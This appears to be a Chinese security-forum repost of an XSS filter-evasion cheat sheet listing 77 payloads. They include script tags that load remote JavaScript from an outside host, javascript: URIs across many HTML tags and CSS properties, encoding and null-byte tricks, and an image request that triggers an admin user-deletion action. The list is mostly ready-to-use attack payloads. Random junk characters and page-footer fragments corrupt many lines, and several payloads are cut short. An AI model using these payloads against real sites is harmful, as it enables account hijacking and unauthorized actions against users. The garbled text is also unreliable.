貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。' J' |& j0 m- e3 i
(1)普通的XSS JavaScript注入
& Z& k, X R! q$ r/ I<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 e1 C! q0 M( ~0 A5 X7 f( w; m6 S$ B, r(2)IMG标签XSS使用JavaScript命令5 @) x' l) u! P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ ]2 b8 ^$ u. T2 L(3)IMG标签无分号无引号% ?5 s1 b4 ~9 F; U9 ]7 C
<IMG SRC=javascript:alert(‘XSS’)>
) w+ n" w" @+ K8 a! C5 o(4)IMG标签大小写不敏感
& w! m; W/ J# z/ N<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 u7 o0 y4 N- r ?) t(5)HTML编码(必须有分号)
8 W$ `# ^. u/ A( U<IMG SRC=javascript:alert(“XSS”)>
1 W% P2 r9 h0 {* O* @! r$ U7 X5 N(6)修正缺陷IMG标签
9 i4 `3 O* ]; M J! O v<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ k# t8 ^ _- P G! \
0 y8 t j% ?9 S3 v
d9 @4 G+ j# d0 s4 u(7)formCharCode标签(计算器)
7 Q0 u1 Q4 j% T$ {8 L3 H<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 W) n2 O; s& l& l* ~2 k(8)UTF-8的Unicode编码(计算器)
; v! t1 ~( v8 ~: E8 L<IMG SRC=jav..省略..S')>9 _1 E: k6 l$ @3 j* _5 E/ t
(9)7位的UTF-8的Unicode编码是没有分号的(计算器): E3 t& u4 w e a6 `. g
<IMG SRC=jav..省略..S')> B& N* H# N7 M' V5 `9 S$ h$ l4 ] `
(10)十六进制编码也是没有分号(计算器)
7 W$ b! x2 J r& a0 E<IMG SRC=java..省略..XSS')>
' `1 h& w f" {" \6 L0 t8 }: P(11)嵌入式标签,将Javascript分开
! E: z3 F3 w% Y) ^% P9 H<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 `5 j: r& F! V1 }9 Q(12)嵌入式编码标签,将Javascript分开
0 }+ ~! y& \5 Q: O" e8 l<IMG SRC=”jav ascript:alert(‘XSS’);”>2 b9 B1 _) i& J! m1 Y
(13)嵌入式换行符' R( t1 W+ R. O$ T
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 [: ]/ k6 v' F(14)嵌入式回车
9 y, x) }# O/ M<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 Z$ I: p6 M9 P5 f! B(15)嵌入式多行注入JavaScript,这是XSS极端的例子
! K8 ^8 N) I& c# r0 `7 M z! Z6 C<IMG SRC=”javascript:alert(‘XSS‘)”>
) ]. l( Z1 Y6 S7 Y(16)解决限制字符(要求同页面), D( z6 B" l& K. X' H
<script>z=’document.’</script>- h7 T* e2 V8 `, o
<script>z=z+’write(“‘</script>( S: P- m9 n9 s& C
<script>z=z+’<script’</script>
! [& I6 T- t* F: X% B" H( e<script>z=z+’ src=ht’</script>- ~ e& G. d# p6 A$ L
<script>z=z+’tp://ww’</script>
5 c Y( F; F" z# F, J<script>z=z+’w.shell’</script>
5 d2 K4 o( v, e5 K3 O0 H<script>z=z+’.net/1.’</script>8 }1 _: }/ ~5 F+ L1 E9 |2 E
<script>z=z+’js></sc’</script>
9 ]( [, t5 `; [<script>z=z+’ript>”)’</script>
$ x4 c, Z8 W0 x+ t<script>eval_r(z)</script>
' Y: q9 f5 \8 ?, J, m(17)空字符12-7-1 T00LS - Powered by Discuz! Board
3 P4 {6 W+ @) ]4 T# D, [8 e) ^https://www.t00ls.net/viewthread ... table&tid=15267 2/62 v) m! ~4 r3 }& I, p# T0 t
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out, S% `& _9 B7 {+ d1 y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 s7 W/ l' e4 h
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out" M4 q+ U! z1 Q0 n; ~9 j* F
(19)Spaces和meta前的IMG标签( A: B% i" \% f( N
<IMG SRC=” javascript:alert(‘XSS’);”>
& U% G0 Y/ M, p' [- S2 v$ G(20)Non-alpha-non-digit XSS6 \' g, ?) K6 J( \8 M
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 @3 n) X' ]6 Q+ a# B8 v
(21)Non-alpha-non-digit XSS to 2* `- Z2 p1 R6 h+ x# w( F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ ^" \% d) r! G3 A$ v9 b$ W
(22)Non-alpha-non-digit XSS to 3
8 M/ ^9 r* k8 \, R<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) A, i/ u) A( g u8 l: F* n, ?$ A z
(23)双开括号
1 _( e$ ]4 N8 k: S F' G- B<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ y: I# k& m+ o: _, i0 `, K" W(24)无结束脚本标记(仅火狐等浏览器)
" a1 a# l' |5 t, _<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 F* W; n0 j; P, [, r; U
(25)无结束脚本标记2
+ M d8 r: N4 v9 J" O4 t<SCRIPT SRC=//3w.org/XSS/xss.js>$ f2 x' H, p* m/ y
(26)半开的HTML/JavaScript XSS
/ A! o c6 j* _4 ^<IMG SRC=”javascript:alert(‘XSS’)”) H* {9 |( o! w4 w) ~
(27)双开角括号# y: P) m- M" k% t0 I
<iframe src=http://3w.org/XSS.html <
. `4 ?- _1 E1 a6 `* i(28)无单引号 双引号 分号
4 P. B& x9 Y& K6 l/ u- X& e/ m<SCRIPT>a=/XSS/
5 }7 ]8 _& e, Malert(a.source)</SCRIPT>
8 x9 k' w5 g9 `7 d0 p6 y: d: f(29)换码过滤的JavaScript$ P% q! o/ i P; Q, S3 e' W5 r3 E1 a- p
\”;alert(‘XSS’);//* O+ {6 h' D4 n G1 c% w
(30)结束Title标签
$ Z$ m) V9 P4 O" M2 ?0 X</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' P- u, c4 p: t5 a; L7 p$ A- [, s+ c3 y(31)Input Image
" [, Q2 E2 p% c+ ~<INPUT SRC=”javascript:alert(‘XSS’);”>; j# Z; W- \9 l) r( m5 H; W
(32)BODY Image' i2 b( X# H& i5 K& W, V( e8 F: V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 { v3 e6 f' g, F
(33)BODY标签5 z0 Z) z4 b0 |7 i7 O: _
<BODY(‘XSS’)>2 e4 M: T3 F% \; O: B
(34)IMG Dynsrc
, L/ E, h7 _( K4 i6 c<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ |/ u# f* Z+ y. \* A/ v: a* h6 e7 a(35)IMG Lowsrc
$ ^; F7 x; X5 C. J4 A<IMG LOWSRC=”javascript:alert(‘XSS’)”>7 A j v! z& y
(36)BGSOUND, m6 h: L% H* L( l4 o6 u1 `5 D* e. Q
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( m, [. ?6 ~% v' D) G( J(37)STYLE sheet9 F# c' J3 P5 l' m3 r" P$ ]% e3 N
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>+ [7 U+ E! ]/ k5 g
(38)远程样式表$ ?( v3 A, d3 l' ~" @
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 A2 F: n3 ^) X( E
(39)List-style-image(列表式): l9 Z# Q4 G: x# M- ]; G- Z9 L
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 G9 H; U/ J# N
(40)IMG VBscript
1 A7 W/ U4 r' U* j<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS+ C' d& j7 s) Y( G7 @' P
(41)META链接url. v, g& ~% w& ~! |7 v! c/ x7 e2 z
! D1 O& I! G9 n- x: Y- f, I' A4 \, W9 b2 V
<META HTTP-EQUIV=”refresh” CONTENT=”0;
- U0 G) ?* ~4 y1 BURL=http://;URL=javascript:alert(‘XSS’);”>* N$ [! c: `2 n, x
(42)Iframe
0 j7 T7 v; S1 Z* \* {7 Y: ~5 F<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( }4 I9 d* m4 a4 o" c
(43)Frame v- S4 O0 l% K6 j7 s* U
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board& I8 e, q4 k a8 R2 v. R& C F/ `
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
- w$ p# M9 k" [7 P+ L& j(44)Table
3 r) ^% k$ c5 n( T+ v<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# T8 k. s8 }* Z" E(45)TD; e& Y2 k! L' p: e" C; s) I
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* |( q- T8 z8 M6 X+ v(46)DIV background-image
' O! w2 E$ l0 F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 {0 d1 P0 [ I5 o! V(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-( _* ]% Q8 n" J: w- K* |
8&13&12288&65279)" U. W2 Y( ^' w5 z4 w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ O- L( K: f* |! ^(48)DIV expression/ E/ a* @+ C' n7 Y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 P: r9 E+ ?8 l: k! r7 D(49)STYLE属性分拆表达* `0 s0 G) `* B3 U9 u
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 N1 L3 J/ Y. x3 P
(50)匿名STYLE(组成:开角号和一个字母开头)9 [: F+ ]# m; t
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ a+ R4 D% D' i/ J, I
(51)STYLE background-image, i+ q. |- h+ s2 I( X
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A5 K# p; r) a: N
CLASS=XSS></A>
7 \9 |2 z; {0 o0 ^' [6 ~(52)IMG STYLE方式4 D+ _9 R: \. a: Q
exppression(alert(“XSS”))’>
0 X! `* b/ P! ?$ t(53)STYLE background
8 J. x: P$ q: Z& x8 G* s! _<STYLE><STYLE
" h( v1 ~/ n0 X2 Etype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' b: o+ C9 S" {: w; R" P
(54)BASE! k6 H5 X9 Y5 D) C P
<BASE HREF=”javascript:alert(‘XSS’);//”> H, u& [7 ~( F% |% b
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" E' c! l% h' w# a0 M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>5 m% [2 s0 e: ?
(56)在flash中使用ActionScrpt可以混进你XSS的代码! b; B0 S+ @/ @* z, Y) z1 I# U
a=”get”;
$ f% ^1 T3 i @# }9 U6 Z+ ^b=”URL(\”";* S7 P+ [) J7 }' _* k
c=”javascript:”;; h$ u- c. ?1 o- [0 p' ` q* f
d=”alert(‘XSS’);\”)”;
# I6 @* Y6 _3 f8 U7 i+ Oeval_r(a+b+c+d); ~+ G! w1 Y- X0 Y! Q! C* t
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' e- X3 n( \' ~3 Q, Y+ F c<HTML xmlns:xss>
/ U( Y. Y. }1 Z) h+ J<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># \0 z2 q. D3 c& \9 [; F
<xss:xss>XSS</xss:xss>
4 P! H4 B" x |</HTML># e5 p- a3 [) G# N2 P
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
) k0 K: r8 Z; O: u+ V<SCRIPT SRC=””></SCRIPT>1 W' G- t C9 M' k
(59)IMG嵌入式命令,可执行任意命令! C. ?, a6 Z' Q4 A+ e" K; {
<IMG SRC=”http://www.XXX.com/a.php?a=b”>0 y$ D i9 z3 A/ d% r: F0 e
(60)IMG嵌入式命令(a.jpg在同服务器)
5 J7 b4 ]5 h: @7 @- o' \$ e" r* MRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* r9 r) q% k% _& g7 q5 a, j* f(61)绕符号过滤+ m q" t% O- _% g/ Y5 }+ D) [
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, S: D/ u) a8 Z" R4 M5 b(62)
3 I' w: z/ H$ O& z ~3 E( l<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 `, d) l+ b/ i5 g4 R- H(63)
y$ M- p5 {1 V4 i0 O/ Q3 \" D<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ D+ {; D" F) K. R3 W8 W(64)
1 c2 r0 `/ k. c- C* g<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
+ Z6 M0 d( n. D8 R8 H(65): Q. Q% Z" t5 N
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
, d4 I( M( `0 n X, n' F7 _(66)12-7-1 T00LS - Powered by Discuz! Board
; j7 R0 J3 s4 v, X E) zhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6% I* o; K" i9 ?5 p
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
# \: {+ Q! C) z(67)) x. ~) p4 [! l
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
M2 E& N9 M/ t" \1 E( H3 }</SCRIPT>% m1 L" q2 x6 t/ \/ L- n9 V
(68)URL绕行; z8 @7 ~- A2 _+ U" c# v
<A HREF=”http://127.0.0.1/”>XSS</A>
, f3 S* p# w i4 O, z! M/ b. O(69)URL编码
! Y: R) }- E- F7 M- M<A HREF=”http://3w.org”>XSS</A>
( W( D- C7 [. y# N$ N(70)IP十进制; r7 N" M. M3 X8 p- D8 w1 A. t
<A HREF=”http://3232235521″>XSS</A>% E* [2 a. R* H1 U% ^
(71)IP十六进制! m) d+ \& m. v- v4 `% | f6 K
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># n2 ^3 {5 [% x. R: e
(72)IP八进制# y5 i. z7 P; ~ B5 b
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
0 X W4 R+ c; O6 |$ c5 e5 I O(73)混合编码$ M4 j: N. N! | e
<A HREF=”h5 M* e3 M4 V8 g6 p6 a0 B$ n: i Q
tt p://6 6.000146.0×7.147/”">XSS</A>
8 Y R( r4 U" W. j3 `(74)节省[http:]+ }1 @, a/ L ] A! U, a
<A HREF=”//www.google.com/”>XSS</A>9 f; v3 ]6 E* D: } X" t
(75)节省[www]- F# [% ^4 t" v# c0 x
<A HREF=”http://google.com/”>XSS</A>/ {- K$ C' i$ a X2 L9 e
(76)绝对点绝对DNS6 {; ^3 ?+ ?4 F4 j1 Y/ a; `
<A HREF=”http://www.google.com./”>XSS</A>8 e( ]/ E& @+ U' N; i* m
(77)javascript链接/ c5 f: c5 C' N) V& a
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
8 L2 I, B% F" y$ Y% ` B/ E3 m& w; Y5 r' Q, Q( v0 T g
原文地址:http://fuzzexp.org/u/0day/?p=14( b# r5 @5 K& A1 I1 |. `
. {" `; x% f3 T* M! T8 J, M
|
发表于 2013-4-19 19:22:37
收藏
支持
反对